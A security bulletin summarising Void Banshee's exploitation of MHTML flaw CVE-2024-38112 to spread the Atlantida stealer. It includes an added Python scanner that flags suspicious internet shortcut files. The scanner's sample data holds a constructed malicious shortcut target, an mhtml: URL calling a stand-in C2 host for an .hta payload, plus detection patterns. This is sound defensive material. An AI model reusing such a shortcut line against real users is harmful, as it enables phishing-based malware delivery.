Void Banshee APT Exploits Microsoft MHTML Flaw to Spread Atlantida Stealer

Summary:
The APT group Void Banshee has been exploiting a newly disclosed security flaw in the Microsoft MHTML browser engine, CVE-2024-38112, to deploy the information-stealing malware Atlantida. Cybersecurity firm Trend Micro observed this activity in mid-May 2024, noting that the vulnerability was used in a multi-stage attack involving specially crafted internet shortcut (URL) files.

Trend Micro researchers Peter Girnus and Aliakbar Zahravi noted that variations of the Atlantida campaign have been active throughout 2024, with CVE-2024-38112 used to strengthen Void Banshee's infection chains. The ability of APT groups to exploit discontinued services such as Internet Explorer poses a significant threat globally. Check Point previously disclosed a similar campaign exploiting the same flaw to distribute the Atlantida stealer. Microsoft addressed CVE-2024-38112, which it described as a spoofing vulnerability in the MSHTML browser engine, in a recent Patch Tuesday update; the Zero Day Initiative, however, classified it as a remote code execution flaw.

The attack chain involves spear-phishing emails with links to ZIP archives containing URL files that exploit the vulnerability, redirecting victims to compromised sites hosting malicious HTML Application (HTA) files. Executing these HTA files triggers a Visual Basic Script (VBS) that downloads a PowerShell script, ultimately deploying a .NET trojan loader that decrypts and executes the Atlantida stealer using the Donut shellcode project. Modeled on open-source stealers like NecroStealer and PredatorTheStealer, Atlantida is designed to extract files, screenshots, geolocation data, and sensitive information from web browsers and applications such as Telegram, Steam, FileZilla, and cryptocurrency wallets.
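The chain above starts with an internet shortcut (.url) file delivered inside a ZIP archive, so a defender triaging such an archive can parse each shortcut and flag targets that hand the link to the MHTML engine, embed a second URL inside the first, or resolve to an HTML Application. The following script is an added example for this page, not code from Trend Micro or The Hacker News; the shortcut contents and host names are constructed for the example, and the three checks are assumptions about what a suspicious shortcut from this campaign would look like, not a reproduction of the actual exploit file format.

```python
"""Added example: flag suspicious Windows internet shortcut (.url) files.

A .url file is INI-style text with an [InternetShortcut] section and a
URL= key. The checks below are assumptions about what makes a target
suspicious in the context of the MHTML flaw and the HTA follow-on stage.
"""
from typing import Dict, List, Optional

# Schemes that are handled by the MHTML engine rather than a normal browser (assumption).
SUSPICIOUS_SCHEMES = {"mhtml"}
# File extensions that indicate a script host is the real target (HTA per the write-up).
SUSPICIOUS_EXTENSIONS = (".hta",)


def parse_url_shortcut(text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None if absent."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "url":
                return value.strip()
    return None


def assess_target(url: str) -> List[str]:
    """Return a list of human-readable findings for a shortcut target (empty = nothing odd)."""
    findings = []
    scheme = url.split(":", 1)[0].lower() if ":" in url else ""
    if scheme in SUSPICIOUS_SCHEMES:
        findings.append(f"target uses the {scheme}: scheme (handled by the MHTML engine)")
    # A second "://" inside the value means one URL wraps another: a redirect chain.
    if url.count("://") > 1:
        findings.append("target embeds a second URL (possible redirect chain)")
    # Look at the last URL in the chain and strip query/fragment before checking the extension.
    final = url.rsplit("://", 1)[-1]
    final_path = final.split("?", 1)[0].split("#", 1)[0]
    if final_path.lower().endswith(SUSPICIOUS_EXTENSIONS):
        findings.append("target resolves to an HTML Application (.hta)")
    return findings


def scan_shortcuts(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each .url file name (as extracted from an archive) to its findings; clean files are omitted."""
    results = {}
    for name, content in files.items():
        if not name.lower().endswith(".url"):
            continue
        target = parse_url_shortcut(content)
        if target is None:
            continue
        findings = assess_target(target)
        if findings:
            results[name] = findings
    return results


# Constructed sample archive contents (not real campaign artefacts).
SAMPLE_SHORTCUTS = {
    "invoice.url": "[InternetShortcut]\r\nURL=https://example.com/docs/invoice.pdf\r\n",
    "report.url": (
        "[InternetShortcut]\r\n"
        "URL=mhtml:http://lure.example.invalid/page!http://c2.example.invalid/launch.hta\r\n"
        "ShowCommand=7\r\n"
    ),
    "readme.txt": "plain text, not a shortcut",
    "empty.url": "[InternetShortcut]\r\nIconIndex=0\r\n",
}

if __name__ == "__main__":
    for name, findings in scan_shortcuts(SAMPLE_SHORTCUTS).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

In practice the `files` mapping would be filled from the extracted archive (for example via `zipfile`), and each finding would be surfaced as an alert on the email or file-gateway side; the point is that the shortcut is plain text and can be inspected long before anything in it is opened.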

Security Officer Comments:
Void Banshee's exploitation method resembles that used against an earlier MSHTML vulnerability, CVE-2021-40444, which was likewise exploited in zero-day attacks. The group has a history of targeting North America, Europe, and Southeast Asia for information theft and financial gain.

Cloudflare recently reported that threat actors are quickly incorporating proof-of-concept (PoC) exploits into their arsenal, often within minutes of public release, as seen with CVE-2024-27198. Additionally, a new campaign using Facebook ads to promote fake Windows themes has been distributing the SYS01stealer, which targets Facebook business accounts to hijack and propagate malware. Trustwave noted that SYS01 focuses on exfiltrating browser data, including credentials, history, cookies, and Facebook account access tokens.

Suggested Corrections:

Trend Micro has published IOCs that can be used to detect and defend against the Void Banshee APT group:
https://www.trendmicro.com/content/...r-in-zero-day-attacks/IOCs-CVE-2024-38112.txt

Link(s):
https://thehackernews.com/2024/07/void-banshee-apt-exploits-microsoft.html